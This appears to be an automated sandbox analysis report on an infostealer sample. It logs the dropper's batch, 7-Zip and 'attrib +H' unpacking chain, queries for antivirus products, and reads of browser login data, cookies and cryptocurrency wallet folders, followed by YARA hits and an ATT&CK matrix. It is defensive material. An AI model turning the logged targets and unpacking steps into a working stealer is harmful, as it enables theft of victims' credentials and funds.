                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                        Source: in.exe, 0000000B.00000002.2155247423.00000000052B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003CB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                        Source: in.exe, 0000000B.00000002.2145079467.0000000003D23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeCode function: 11_2_00BFD07C LdrInitializeThunk,11_2_00BFD07C
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_00402665
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeMemory allocated: page read and write | page guardJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 65,10Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e file.zip -p324051139125346723019431074 -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_4.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_3.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_2.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\7z.exe 7z.exe e extracted/file_1.zip -oextractedJump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +H "in.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\main\in.exe "in.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00402744 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00402744
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeCode function: 5_2_0049D670 cpuid 5_2_0049D670
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,??_U@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_0040247D
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Users\user\AppData\Local\Temp\main\in.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_004039E7 lstrlenW,GetSystemTimeAsFileTime,GetFileAttributesW,memcpy,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004039E7
                        Source: C:\Users\user\Desktop\jjjUC5ggb2nQMb1B6SvBkwmT.exeCode function: 0_2_00405BFC ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,lstrlenW,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,lstrlenW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405BFC
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
                        Source: in.exe, 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
                        Source: in.exe, 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: set_UseMachineKeyStore
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                        Source: Yara matchFile source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 11.0.in.exe.420000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000B.00000000.2022612006.0000000000422000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000B.00000002.2139768224.0000000002A30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: in.exe PID: 5036, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity Information1
                        Scripting
                        Valid Accounts221
                        Windows Management Instrumentation
                        1
                        Scripting
                        1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Native API
                        1
                        DLL Side-Loading
                        1
                        Access Token Manipulation
                        11
                        Deobfuscate/Decode Files or Information
                        11
                        Input Capture
                        4
                        File and Directory Discovery
                        Remote Desktop Protocol3
                        Data from Local System
                        1
                        Non-Standard Port
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
                        Process Injection
                        4
                        Obfuscated Files or Information
                        Security Account Manager137
                        System Information Discovery
                        SMB/Windows Admin Shares11
                        Input Capture
                        1
                        Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                        Install Root Certificate
                        NTDS221
                        Security Software Discovery
                        Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                        Software Packing
                        LSA Secrets1
                        Process Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                        Timestomp
                        Cached Domain Credentials241
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                        DLL Side-Loading
                        DCSync1
                        Application Window Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Masquerading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt241
                        Virtualization/Sandbox Evasion
                        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                        Access Token Manipulation
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
                        Process Injection
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\main\extracted\in.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/sc/sct0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk0%URL Reputationsafe
                        http://tempuri.org/Entity/Id14ResponseD0%URL Reputationsafe
                        http://tempuri.org/Entity/Id23ResponseD0%URL Reputationsafe
                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary0%URL Reputationsafe
                        http://tempuri.org/Entity/Id12Response0%URL Reputationsafe
                        http://tempuri.org/0%URL Reputationsafe
                        http://tempuri.org/Entity/Id2Response0%URL Reputationsafe
                        http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha10%URL Reputationsafe
                        http://tempuri.org/Entity/Id21Response0%URL Reputationsafe
